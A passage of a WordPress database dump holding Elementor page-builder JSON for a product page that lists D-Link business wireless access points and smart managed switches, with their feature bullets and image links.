WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a9f02d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7585,3412,'_elementor_version','2.5.14'),(7586,3412,'_elementor_edit_mode','builder'),(7591,3413,'_elementor_template_type','post');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (7592,3413,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical 